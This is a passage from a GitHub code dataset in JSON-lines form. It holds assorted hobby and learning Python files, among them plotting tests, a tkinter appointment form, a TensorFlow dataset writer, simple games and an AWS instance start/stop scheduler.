fields.append(ax.quiver(0, 0, 0, 0, color=\"C\"+str(i), alpha=.5, width=.01, angles='xy', scale_units='xy', scale=1.5))\nfield_rot = ax.quiver(0, 0, 0, 0, alpha=1, width=.01, angles='xy', scale_units='xy', scale=1.5)\n\nax.set_xlim(-1,1)\nax.set_ylim(-1,1)\nax.set_aspect(\"equal\")\nplt.axis(\"off\")\n\nscale=1\nif n>1:\n scale = 2/n\ndef animate(i):\n Bxtot, Bytot = 0, 0\n for k, field in enumerate(fields):\n alpha = k*np.pi/n\n phi = -k*np.pi/n\n Bx = B(t[i], phi, a=scale) * np.cos(alpha)\n By = B(t[i], phi, a=scale) * np.sin(alpha)\n field.set_UVC(Bx,By)\n Bxtot += Bx\n Bytot += By\n field_rot.set_UVC(Bxtot,Bytot)\n return\n\nani = animation.FuncAnimation(fig, animate, frames=len(t), interval=1e3/fps)\nplt.show()","repo_name":"remimetzdorff/mp2i","sub_path":"python/chap18-champ_tournant.py","file_name":"chap18-champ_tournant.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33751466135","text":"import random, time\n\natributos = {\"fuerza\": 0, \"destreza\": 0, \"resistencia\": 0, \"inteligencia\": 0, \"percepcion\": 0, \"carisma\": 0}\nhabilidades = {}\n\ntiradas1 = 0\ntiradas2 = 0\ntiradas3 = 0\ntiradas4 = 0\ntiradas5 = 0\ntiradas6 = 0\ntiradas7 = 0\ntiradas8 = 0\ntiradas9 = 0\ntiradas10 = 0\n\nvaloresMedios = []\n\n\ndef generarAtributos():\n charValue = 0\n for x in atributos:\n atributos[x] = random.randrange(1, 11)\n charValue += atributos[x]\n print(x + \": \" + str(atributos[x]))\n # guardamos el numero de tiradas de cada valor\n if atributos[x] == 1:\n global tiradas1\n tiradas1 += 1\n elif atributos[x]==2:\n global tiradas2\n tiradas2 += 1\n elif atributos[x]==3:\n global tiradas3\n tiradas3 += 1\n elif atributos[x]==4:\n global tiradas4\n tiradas4 += 1\n elif atributos[x]==5:\n global tiradas5\n tiradas5 += 1\n elif atributos[x]==6:\n global tiradas6\n tiradas6 += 1\n elif atributos[x]==7:\n global tiradas7\n tiradas7 += 1\n elif atributos[x]==8:\n global tiradas8\n tiradas8 += 1\n elif atributos[x]==9:\n global tiradas9\n tiradas9 += 1\n elif atributos[x]==10:\n global tiradas10\n tiradas10 += 1\n else:\n print(\"error\")\n print(atributos)\n print(\"Character Value: \" + str(charValue) + \"/60\")\n valoresMedios.append(charValue)\n\n\ndef generarHabilidades():\n x = \"Empty\"\n while x != \"end\":\n x = input(\"Escribe una habilidad (end para finalizar)\")\n if x != \"end\":\n habilidades[x] = 0\n print(habilidades)\n\n\nti = time.time()\nfor x in range(0, 10000):\n generarAtributos()\n\ntf = time.time()\nprint(\"Tiempo: \" + str(int(tf - ti)) + \"s\")\nvaloresMedios.sort()\nfor x in range(6, 61):\n count = 0\n for y in valoresMedios:\n if x == y:\n count += 1\n print(\"Hay \" + str(count) + \" \" + str(x))\nprint(\"Hay \"+str(tiradas1)+\" unos\")\nprint(\"Hay \"+str(tiradas2)+\" doses\")\nprint(\"Hay \"+str(tiradas3)+\" treses\")\nprint(\"Hay \"+str(tiradas4)+\" cuatros\")\nprint(\"Hay \"+str(tiradas5)+\" cincos\")\nprint(\"Hay \"+str(tiradas6)+\" seises\")\nprint(\"Hay \"+str(tiradas7)+\" sietes\")\nprint(\"Hay \"+str(tiradas8)+\" ochos\")\nprint(\"Hay \"+str(tiradas9)+\" nueves\")\nprint(\"Hay \"+str(tiradas10)+\" dieces\")\nprint(\"Se han realizado \"+str((tiradas1+tiradas2+tiradas3+tiradas4+tiradas5+tiradas6+tiradas7+tiradas8+tiradas9+tiradas10))+\" tiradas\")\n# print(valoresMedios)\n","repo_name":"omartorrado/EjemplosDeUsoPython","sub_path":"CharCreation.py","file_name":"CharCreation.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32004246652","text":"import argparse\n\nimport numpy as np\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--gts\",\n type=str,\n required=True,\n help=\"path to genotypes\",\n )\n parser.add_argument(\n \"--output\",\n type=str,\n required=True,\n help=\"path to output mmap\",\n )\n return parser.parse_args()\n\n\ndef load_gts(gts_path: str):\n gts = []\n with open(gts_path, \"r\") as f:\n for line in f:\n A = line.rstrip().split()\n gts.append(np.array([int(x) for x in A[1:]], dtype=np.int8)) # skip sample\n return np.array(gts, dtype=np.int8)\n\n\ndef make_memmaps(arr: np.ndarray, output: str):\n \"\"\"Write the gts array to a memory-mapped file.\"\"\"\n gts_mmap = np.memmap(output, dtype=np.int8, mode=\"w+\", shape=arr.shape)\n gts_mmap[:] = arr[:]\n gts_mmap.flush()\n\n\ndef main(gts: str, output: str):\n arr = load_gts(gts)\n make_memmaps(arr, output)\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(**vars(args))\n","repo_name":"kristen-schneider/precision-medicine","sub_path":"pytorch/exploration/make_gt_mmap.py","file_name":"make_gt_mmap.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19902848486","text":"def replace(self, old, new):\n while old in self:\n self[self.index(old)] = new\n\n\nAdvancedList = type('AdvancedList', (list, ), {'desc': '향상된 리스트', 'replace': replace})\n\nx = AdvancedList([1, 2, 3, 1, 2, 3, 1, 2, 3])\nx.replace(1, 100)\n\nprint(x)\nprint(x.desc)\n\n\nclass MakeCalc(type):\n def __new__(mcs, name, bases, namespace):\n namespace['desc'] = '계산 클래스'\n namespace['add'] = lambda self, a, b: a + b\n return type.__new__(mcs, name, bases, namespace)\n\n\nCalc = MakeCalc('Calc', (), {})\nc = Calc()\nprint(c.desc)\nprint(c.add(1, 2))\n\n\n","repo_name":"giinie/CSBootcamp","sub_path":"src/learn_python_the_right_way/unit_47/metaclass.py","file_name":"metaclass.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12447007844","text":"import sys; sys.path.insert(0, \"..\") # noqa\nfrom pathlib import Path\nfrom unittest import TestCase, main\n\nfrom dkit.etl import source\nfrom dkit.plot import ggrammar\nfrom dkit.plot.gnuplot import BackendGnuPlot\nfrom dkit.plot.matplotlib import MPLBackend\nfrom dkit.plot.plotly import PlotlyBackend\nfrom dkit.utilities.file_helper import yaml_load\nfrom sample_data import plot_data, scatter_data, histogram_data, control_chart_data, gapminder\n\n\nwith open(\"stylesheet.yaml\", \"rt\") as infile:\n style_sheet = yaml_load(infile)\n\n\nclass AbstractPlot(object):\n\n @classmethod\n def setUpClass(cls):\n out_path = Path.cwd() / \"plots\"\n if not out_path.exists():\n print(\"Creating plots folder\")\n out_path.mkdir()\n cls.out_path = out_path\n\n def gen_plt(self, data):\n plt = ggrammar.Plot(data) \\\n + ggrammar.Title(\"2018 Sales\") \\\n + ggrammar.YAxis(\"Rand\") \\\n + ggrammar.XAxis(\"Month\", rotation=70) \\\n + ggrammar.Aesthetic(stacked=True, width=15, height=10)\n\n return plt\n\n def test_area_plot(self):\n \"\"\"test area plot\"\"\"\n plt = self.gen_plt(plot_data)\n plt += ggrammar.GeomArea(\"Revenue\", \"index\", \"revenue\", color=\"#0000FF\", alpha=0.8)\n self.render(plt, \"area_plot.svg\")\n\n def test_bar_plot(self):\n \"\"\"test bar plots\"\"\"\n plt = self.gen_plt(plot_data)\n plt += ggrammar.GeomBar(\"Revenue\", \"index\", \"revenue\", alpha=0.6)\n self.render(plt, \"bar_plot.svg\")\n\n def test_line_plot(self):\n \"\"\"test bar plots\"\"\"\n plt = self.gen_plt(plot_data)\n plt += ggrammar.GeomLine(\"Revenue\", \"index\", \"revenue\", alpha=0.6)\n self.render(plt, \"line_plot.svg\")\n\n def test_scatter_plot(self):\n \"\"\"test scatter plot\"\"\"\n plt = ggrammar.Plot(scatter_data) \\\n + ggrammar.GeomScatter(\"Scatter Plot\", \"x\", \"y\", alpha=0.6) \\\n + ggrammar.Title(\"Random Scatter Plot\") \\\n + ggrammar.YAxis(\"Random Y\") \\\n + ggrammar.XAxis(\"Random X\", rotation=70)\n\n self.render(plt, \"scatter_plot.svg\")\n\n def test_histogram_plot(self):\n \"\"\"test histogram plot\"\"\"\n plt = ggrammar.Plot(histogram_data) \\\n + ggrammar.GeomHistogram(\"random data\") \\\n + ggrammar.Title(\"Random Data Histogram\") \\\n + ggrammar.YAxis(\"Frequency\") \\\n + ggrammar.XAxis(\"bin\")\n self.render(plt, \"histogram_plot.svg\")\n\n def test_slope_plot(self):\n if self.__class__.__name__ in [\"TestMatplotlib\"]:\n with source.load(\"input_files/slope.jsonl\") as src:\n data = list(src)\n plt = ggrammar.Plot(data) \\\n + ggrammar.GeomSlope(\n \"Slope Plot example\",\n \"continent\",\n \"year\",\n \"value\"\n ) + ggrammar.YAxis(\"Value\")\n\n self.render(plt, \"slope_plot.svg\")\n\n\nclass TestGnuPlot(AbstractPlot, TestCase):\n\n def render(self, plt, file_name):\n BackendGnuPlot(\"svg\").render(\n plt.as_dict(),\n file_name=self.out_path / f\"gnuplot_{file_name}\"\n )\n\n\nclass TestMatplotlib(AbstractPlot, TestCase):\n\n def test_fill_plot(self):\n \"\"\"test fill plot\"\"\"\n plt = self.gen_plt(control_chart_data)\n plt += ggrammar.GeomFill(\n \"Control Chart\",\n x_data=\"index\",\n y_upper=\"upper\",\n y_lower=\"lower\"\n )\n self.render(plt, \"fill_plot.svg\")\n\n def render(self, plt, filename):\n MPLBackend(\"svg\", style_sheet=style_sheet).render(\n plt.as_dict(),\n file_name=self.out_path / f\"mpl_{filename}\"\n )\n\n\nclass TestPlotly(AbstractPlot, TestCase):\n\n def render(self, plt, filename):\n PlotlyBackend(\"svg\", style_sheet=style_sheet).render(\n plt.as_dict(),\n file_name=self.out_path / f\"plotly_{filename}\"\n )\n\n def _test_treemap(self):\n \"\"\"test fill plot\"\"\"\n plt = ggrammar.Plot(gapminder) \\\n + ggrammar.Title(\"Population\") \\\n + ggrammar.GeomTreeMap(\n path=[\"continent\", \"country\"],\n size_field=\"pop\",\n color_field=\"lifeExp\"\n )\n self.render(plt, \"treemap_plot.svg\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cobusn/dkit","sub_path":"test/test_plot.py","file_name":"test_plot.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70466959185","text":"\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom tkcalendar import *\nimport datetime\n\nfrom Backend.backend_db import Database\nfrom Directories.save_appointments import *\n\ndatabase=Database(\"Metra.db\")\n\n\nclass Appointment:\n def __init__(self, master, employeeId, customerName, customerId):\n self.master=master\n self.employeeId=employeeId\n self.customerName = customerName\n self.customerId = customerId\n self.created_at = datetime.datetime.now()\n\n self.year = datetime.date.today().year\n self.month = datetime.date.today().month\n self.day = datetime.date.today().day\n \n\n \n\n \n \n master.title('Create Appointment')\n # master.resizable(False, False)\n master.geometry('800x800')\n master.configure(background = '#e1d8b9')\n self.frame_header = ttk.Frame(master)\n self.frame_header.pack()\n\n ttk.Label(self.frame_header, text = \"Make an appointment\").grid(row=0, column =1)\n self.frame_content = ttk.Frame(master)\n self.frame_content.pack()\n\n ttk.Label(self.frame_content, text = 'Customer Name:').grid(row = 0, column = 0)\n self.entry_customerName = ttk.Entry(self.frame_content, width = 24, font = ('Arial', 14)) \n self.entry_customerName.grid(row = 0, column = 1, padx=5)\n ttk.Label(self.frame_content, text = 'Phone No:').grid(row = 1, column = 0)\n self.entry_customerId = ttk.Entry(self.frame_content, width = 24, font = ('Arial', 14)) \n self.entry_customerId.grid(row = 1, column = 1, padx=5)\n\n \n \n\n ttk.Label(self.frame_content, text = 'Date:').grid(row = 3, column = 0)\n self.cal = Calendar(self.frame_content, date_pattern=\"dd-mm-y\",showweeknumbers=False, foreground='black', background='blue', font=(14),selectedmode=\"day\", year=self.year, month=self.month, day=self.day)\n self.cal.grid(row = 3, column=1, padx=5)\n \n \n # self.entry_app_date = ttk.Entry(self.frame_content, width = 24, font = ('Arial', 14)) \n # self.entry_app_date.grid(row = 1, column = 2, padx = 5)\n\n ttk.Label(self.frame_content, text = 'Employee Id: ').grid(row = 4, column = 0)\n\n # -----------Select from Combobox-------------------\n self.employee_Id = StringVar()\n self.employee_Id_cb = ttk.Combobox(self.frame_content, textvariable=self.employee_Id)\n self.employee_Id_cb.grid(row=4, column=1, padx=5)\n # --------Add values to the combobox-----\n self.employee_Id_cb.config(values = ('Architect', 'Structural', 'Inspector'))\n # self.payment_type.get() #to get the chosen value\n \n \n ttk.Button(self.frame_content, text = 'Save',\n command = self.submit).grid(row = 8, column = 0, padx = 5, pady = 5, sticky = 'e')\n \n def submit(self): \n \n self.customerId = self.entry_customerId.get()\n database.insert_appointment(self.employeeId, self.entry_customerId.get(), self.entry_customerName.get(), self.cal.get_date())\n print(self.cal.get_date())\n # database.insert_appointment(self.employeeId, self.customerId, self.entry_customerName.get(), self.entry_app_date.get())\n make_output_dir(self.customerId)\n save_customer_appointments(self.employee_Id.get(), self.entry_customerId.get(), self.entry_customerName.get(), self.cal.get_date())\n messagebox.showinfo(title = \"Appointment\", message = \"Appointment Submited!\")\n self.close_window()\n def close_window(self):\n self.master.destroy()\n \n\n\n\n\n\n\n","repo_name":"zelal-Eizaldeen/gui-os","sub_path":"Appointment/appointment_template.py","file_name":"appointment_template.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8495895346","text":"import os\nimport argparse\nimport time\nimport tensorflow as tf\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--dataset\", choices=[\"cifar10\"], required=True, help=\"dataset to create\") # , \"imagenet1k\"\n # parser.add_argument(\"-p\", \"--path\", help=\"path to imagenet\")\n parser.add_argument(\"-w\", \"--write-dir\", default=\"tfrecords/\", help=\"path to write TFRecords\")\n \n cfg = parser.parse_args()\n\n print(cfg)\n\n wpath = os.path.join(cfg.write_dir, cfg.dataset)\n\n if not os.path.isdir(wpath):\n os.makedirs(wpath)\n\n if cfg.dataset == \"cifar10\":\n cifar10(wpath)\n elif cfg.dataset == \"imagenet1k\":\n raise NotImplementedError(\"imagenet1k not implemented\")\n\n\ndef cifar10(path):\n print(\"Loading CIFAR10\")\n (train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.cifar10.load_data()\n tf.constant([2])\n\n\n start = time.perf_counter()\n print(\"Serializing Train Batch\")\n\n with tf.io.TFRecordWriter(os.path.join(path, \"train.tfrecord\")) as writer:\n data = tf.train.Example(\n features = tf.train.Features(\n feature = {\n \"imgs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ tf.io.serialize_tensor(train_images).numpy() ])),\n \"labels\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ tf.io.serialize_tensor(train_labels).numpy() ]))\n }\n )\n )\n\n print(\"Writing to TFRecord file\")\n writer.write(\n data.SerializeToString()\n )\n\n \n with tf.io.TFRecordWriter(os.path.join(path, \"val.tfrecord\")) as writer:\n print(\"Serializing Validation Batch\")\n data = tf.train.Example(\n features = tf.train.Features(\n feature = {\n \"imgs\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ tf.io.serialize_tensor(test_images).numpy() ])),\n \"labels\": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ tf.io.serialize_tensor(test_labels).numpy() ])),\n }\n )\n )\n\n print(\"Writing to TFRecord file\")\n writer.write(\n data.SerializeToString()\n )\n\n elapsed = time.perf_counter() - start\n print('Elapsed %.3f seconds.' % elapsed)\n\n\n\nif __name__ == \"__main__\":\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\n main()\n","repo_name":"MoonArchitect/tensorflow-CNNs","sub_path":"prepare_dataset.py","file_name":"prepare_dataset.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"30914648561","text":"from IPython.display import clear_output\n\ndef display_board(board):\n clear_output()\n print(f' {board[7]} | {board[8]} | {board[9]} ')\n print(f' {board[4]} | {board[5]} | {board[6]} ')\n print(f' {board[1]} | {board[2]} | {board[3]} ')\n\ntest_board = ['#','X','O','X','O','X','O','X','O','X']\ndisplay_board(test_board)\n\ndef player_input():\n \n marker = \"\"\n while marker != \"X\" and marker != \"O\":\n market = input(\"Player 1: Choose X or O: \").upper()\n\n if market == \"X\":\n return (\"X\", \"O\")\n else:\n return (\"O\",\"X\")\n \ndef place_marker(board, marker, position):\n \n board[position] = marker\n\nprint(test_board)\nplace_marker(test_board,'$',8)\ndisplay_board(test_board)\n","repo_name":"oguzcanaygun/TicTacToe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34680250435","text":"__author__ = 'Vivek Gour'\n__copyright__ = 'Copyright 2018, Vivek Gour'\n__version__ = '1.0.0'\n__maintainer__ = 'Vivek Gour'\n__email__ = 'Viv30ek@gmail.com'\n__status__ = 'Learning'\n\n\"\"\"\nPython List Methods\nappend() - Add an element to the end of the list\nextend() - Add all elements of a list to the another list\ninsert() - Insert an item at the defined index\nremove() - Removes an item from the list\npop() - Removes and returns an element at the given index\nclear() - Removes all items from the list\nindex() - Returns the index of the first matched item\ncount() - Returns the count of number of items passed as an argument\nsort() - Sort items in a list in ascending order\nreverse() - Reverse the order of items in the list\ncopy() - Returns a shallow copy of the list\n\nFunction\tDescription\nall()\tReturn True if all elements of the list are true (or if the list is empty).\nany()\tReturn True if any element of the list is true. If the list is empty, return False.\nenumerate()\tReturn an enumerate object. It contains the index and value of all the items of list as a tuple.\nlen()\tReturn the length (the number of items) in the list.\nlist()\tConvert an iterable (tuple, string, set, dictionary) to a list.\nmax()\tReturn the largest item in the list.\nmin()\tReturn the smallest item in the list\nsorted()\tReturn a new sorted list (does not sort the list itself).\nsum()\tReturn the sum of all elements in the list.\n\nLists are allocated in two blocks: the fixed one with all the Python object information and a variable sized block for\nthe data. It is the reason creating a tuple is faster than List. It also explains the slight difference in indexing \nspeed is faster than lists, because in tuples for indexing it follows fewer pointers.\n\"\"\"\n\n# revers string using slicing\na = [1, 2, 3, 4]\nprint(a[::-1])\nprint(a[::-2])\n# print(a[::0]) # ValueError: slice step cannot be zero\nprint(a[0::])\n# list Comprehension\n\npow2 = [2 ** x for x in range(10)]\nprint(pow2)\n","repo_name":"vivek-gour/Python-Design-Patterns","sub_path":"dataTypes/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7915700153","text":"# Driving is expensive. Write a program with a car's miles/gallon and gas dollars/gallon (both floats) as input, and output the gas cost for 10 miles, 50 miles, and 400 miles.\n\n# Output each floating-point value with two digits after the decimal point, which can be achieved as follows:\n# print('%0.2f %0.2f %0.2f' % (your_value1, your_value2, your_value3))\n\n# Ex: If the input is:\n\n# 20.0\n# 3.1599\n# Then the output is:\n\n# 1.58 7.90 63.20\n# Note: Real per-mile cost would also include maintenance and depreciation.\n\n#---- \n\n# car miles per gallon\n# gas dollar per gallon (both floats)\n# cost 10,50,400 miles\n\nmilesPerGallon = float(input())\ndollarsPerGallon = float(input())\n\nmiles_10 = (10 / milesPerGallon) * dollarsPerGallon\nmiles_50 = (50 / milesPerGallon) * dollarsPerGallon\nmiles_400 = (400 / milesPerGallon) * dollarsPerGallon\n\nprint('%0.2f %0.2f %0.2f' % (miles_10, miles_50, miles_400))","repo_name":"0xzt/Python","sub_path":"Chapter 4/driving_costs.py","file_name":"driving_costs.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69815101586","text":"# Binary Tree node\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n# Function to print the zigzag traversal\ndef zigZagTraversal(root):\n q = deque([])\n v = []\n q.append(root)\n v.append(root.data)\n \n # set initial level as 1, because root is\n # already been taken care of.\n l = 1\n \n while len(q) > 0:\n n = len(q)\n for i in range(n):\n # popping mechanism\n if (l % 2 == 0):\n temp = q[-1]\n q.pop()\n else:\n temp = q[0]\n q.popleft()\n \n # pushing mechanism\n if (l % 2 != 0):\n if (temp.right):\n q.append(temp.right)\n v.append(temp.right.data)\n if (temp.left):\n q.append(temp.left)\n v.append(temp.left.data)\n elif (l % 2 == 0):\n if (temp.left):\n q.appendleft(temp.left)\n v.append(temp.left.data)\n if (temp.right):\n q.appendleft(temp.right)\n v.append(temp.right.data)\n l+=1 # level plus one\n return v\n\n# vector to store the traversal order.\nv = []\n\n# create tree\nroot = Node(1)\nroot.left = Node(2)\nroot.right = Node(3)\nroot.left.left = Node(7)\nroot.left.right = Node(6)\nroot.right.left = Node(5)\nroot.right.right = Node(4)\nprint(\"ZigZag Order traversal of binary tree is\")\n\nv = zigZagTraversal(root)\n\nfor i in range(len(v)):\n print(v[i], end = \" \")\n \n","repo_name":"DDR7707/Final-450-with-Python","sub_path":"Binary Trees/189.Zig Zag Traversal.py","file_name":"189.Zig Zag Traversal.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"38947833283","text":"import os\nimport sys\nimport shutil\nimport tensorflow as tf\nfrom tqdm import tqdm\nfrom config import FLAGS\nfrom tfsolver import TFSolver\nfrom dataset import DatasetFactory\nfrom learning_rate import LRFactory\nfrom network_ae import *\nfrom ocnn import *\n\n\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n\nif len(sys.argv) < 2:\n print('Usage: python run_cls.py config.ymal')\n\n# update FLAGS\nconfig_file = sys.argv[1]\nFLAGS.merge_from_file(config_file)\nFLAGS.freeze()\n\n# backup the config file\nif not os.path.exists(FLAGS.SOLVER.logdir):\n os.makedirs(FLAGS.SOLVER.logdir)\nshutil.copy2(config_file, FLAGS.SOLVER.logdir)\n\n# define the graph\ndef compute_graph(training=True, reuse=False):\n FLAGSD = FLAGS.DATA.train if training else FLAGS.DATA.test\n with tf.name_scope('dataset'):\n dataset = DatasetFactory(FLAGSD)\n octree, label = dataset()\n code = octree_encoder(octree, FLAGS.MODEL, training, reuse)\n loss, accu = octree_decoder(code, octree, FLAGS.MODEL, training, reuse)\n with tf.name_scope('compute_loss'):\n var_all = tf.trainable_variables()\n reg = tf.add_n([tf.nn.l2_loss(v) for v in var_all]) * FLAGS.LOSS.weight_decay\n total_loss = tf.add_n(loss + [reg])\n tensors = loss + [reg] + accu + [total_loss]\n depth = FLAGS.MODEL.depth\n names = ['loss%d' % d for d in range(2, depth + 1)] + ['normal', 'reg'] + \\\n ['accu%d' % d for d in range(2, depth + 1)] + ['total_loss']\n return tensors, names\n\n# define the solver\nclass AeTFSolver(TFSolver):\n def __init__(self, flags):\n super(AeTFSolver, self).__init__(flags)\n\n def build_train_graph(self):\n self.train_tensors, tensor_names = compute_graph(training=True, reuse=False)\n self.test_tensors, tensor_names = compute_graph(training=False, reuse=True)\n total_loss = self.train_tensors[-1]\n self.op_train, lr = build_solver(total_loss, LRFactory(self.flags))\n self.summaries(tensor_names + ['lr'], self.train_tensors + [lr,],\n tensor_names)\n\n def build_test_graph(self):\n self.test_tensors, self.test_names = compute_graph(training=False, reuse=False)\n\n def decode_shape(self):\n # build graph\n FLAGSM = FLAGS.MODEL\n with tf.name_scope('dataset'):\n dataset = DatasetFactory(FLAGS.DATA.test)\n octree, label = dataset()\n code = octree_encoder(octree, FLAGSM, training=False, reuse=False)\n octree_pred = octree_decode_shape(code, FLAGSM, training=False, reuse=False)\n\n # checkpoint\n assert(self.flags.ckpt) # the self.flags.ckpt should be provided\n tf_saver = tf.train.Saver(max_to_keep=20)\n\n # start\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n # restore and initialize\n self.initialize(sess)\n tf_saver.restore(sess, self.flags.ckpt)\n logdir = self.flags.logdir\n tf.summary.FileWriter(logdir, sess.graph)\n\n print('Start testing ...')\n for i in tqdm(range(0, self.flags.test_iter)):\n origin, reconstructed = sess.run([octree, octree_pred])\n with open(logdir + ('/%04d_input.octree' % i), \"wb\") as f:\n f.write(origin.tobytes())\n with open(logdir + ('/%04d_output.octree' % i), \"wb\") as f:\n f.write(reconstructed.tobytes())\n\n# run the experiments\nsolver = AeTFSolver(FLAGS.SOLVER)\nif FLAGS.SOLVER.run == \"train\":\n solver.train()\nelif FLAGS.SOLVER.run == \"test\":\n solver.test()\nelif FLAGS.SOLVER.run == \"decode_shape\":\n solver.decode_shape()\nelse:\n print(\"Error! Unsupported FLAGS.SOLVER.run: \" + FLAGS.SOLVER.run)\n","repo_name":"LONG-9621/O-CNN","sub_path":"tensorflow/script/run_ae.py","file_name":"run_ae.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4546249045","text":"#!/usr/bin/python\n\nimport boto\nimport time\nimport datetime\nimport logging\n\n'''\nThis script starts up our dev server every morning at 7am and shuts\nit down again at 7pm. Here is an example cron entry that runs the\nscript on weekdays at 7am and 7pm:\n\n00 07,19 * * 1,2,3,4,5 /usr/bin/python /path/to/startstop.py\n'''\n\n# Set AWS Instance ID for our server\ndev_id = 'i-5a18ab20'\n# Set AWS Elestic IP for our server\ndev_ip = '23.21.175.158'\n\ninstances = [\n\t{'id': 'i-5a18ab20', 'ip': '23.21.175.158', 'name': 'Dev'},\n#\t{'id': 'i-df89f3a6', 'ip': '54.235.169.209', 'name': 'PuppetMaster'},\n\t{'id': 'i-5a1fef3e', 'ip': '54.227.238.117', 'name': 'beck-dev'}\n]\n\n# Setup logging\nlogging.basicConfig(filename='startstop.log',level=logging.INFO)\n\n# Make our connection to the EC2 API. boto looks for our API\n# key pair in ~/.boto\nec2 = boto.connect_ec2()\n\n# Datetim object\nnow = datetime.datetime.now()\n\nlogging.info('Start run: ' + now.strftime(\"%Y-%m-%d %H:%M\"))\n\nfor instance in instances:\n\t# If it is 7am we need to bring the instance up\n\tif now.hour == 7:\n\t\tlogging.info(instance['name'])\n\t\n\t\t# This starts the instance\n\t\tec2.start_instances(instance_ids=[instance['id']])\n\t\n\t\t# Now we need to create an ofject for the instance so we can\n\t\t# check its status.\n\t\treservations = ec2.get_all_instances()\n\t\n\t\tallinstances = [i for r in reservations for i in r.instances]\n\t\t\n\t\t# When the instance starts, the status will be 'pending'.\n\t\t# We can't attache the elastic IP until the status is 'running'.\n\t\tfor i in allinstances:\n\t\t\tif i.id == instance['id']:\n\t\t\t\tstatus = i.update()\n\t\t\t\twhile status != 'running':\n\t\t\t\t\tlogging.info('Waiting for %s to start' % (instance['name']))\n\t\t\t\t\ttime.sleep(10)\n\t\t\t\t\tstatus = i.update()\n\t\t\t\tif i.state == 'running':\n\t\t\t\t\t# Now that it is running, we can attach the IP.\n\t\t\t\t\tlogging.info('Setting IP for %s' % (instance['name']))\n\t\t\t\t\tec2.associate_address(instance['id'], instance['ip'])\n\t\n\t# If it is 7pm, we need to stop to server.\n\telif now.hour == 19:\n\t\tlogging.info('Stopping %s' % (instance['name']))\n\t\tec2.stop_instances(instance_ids=[instance['id']])\n\t\n\t# If for some reason we run this when we shouldn't will just do nothing.\n\telse:\n\t\tlogging.info('Nothing to do')\n\nlogging.info('Stop run: ' + now.strftime(\"%Y-%m-%d %H:%M\"))\n\n","repo_name":"ecds-archives/cloud-scripts","sub_path":"startstop.py","file_name":"startstop.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36067437707","text":"from turtle import Turtle\n\nclass Scoreboard(Turtle):\n def __init__(self):\n super().__init__()\n self.right_score = 0\n self.left_score = 0\n self.hideturtle()\n self.color(\"white\")\n self.penup()\n self.print_score()\n\n def print_score(self):\n self.goto(0, 300)\n self.clear()\n self.write(f\"{self.left_score} - {self.right_score}\", align=\"center\", font=(\"Courier\", 24, \"normal\"))\n\n def move_score(self, favor):\n if favor == \"right\":\n self.right_score += 1\n elif favor == \"left\": \n self.left_score += 1\n\n def announce_point(self, favor):\n self.goto(0, 0)\n self.write(f\"Point for {favor} player.\", align=\"center\", font=(\"Courier\", 24, \"normal\"))\n ","repo_name":"grzlz/100days","sub_path":"22-pong/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13420462352","text":"# Meta caracteres: ^ $ ( )\r\n# * 0 ou n\r\n# + 1 ou n {1,}\r\n# ? 0 ou 1\r\n# {n}\r\n# {min, max}\r\n# {10,} 10 ou mais\r\n# {,10} De zero a 10\r\n# {10} Especificamente 10\r\n# {5,10} De 5 a 10\r\n# ()+ [a-zA-Z0-9]+\r\n\r\n\r\n# Importando uma biblioteca\r\nimport re\r\n\r\n\r\n# Declarando uma variável\r\ntext = '''\r\nJoão brought flowers to his beloved girlfriend on January 10, 1970,\r\nMaria was her name.\r\n\r\n\r\nIt was an excellent year in the life of joão. He had 5 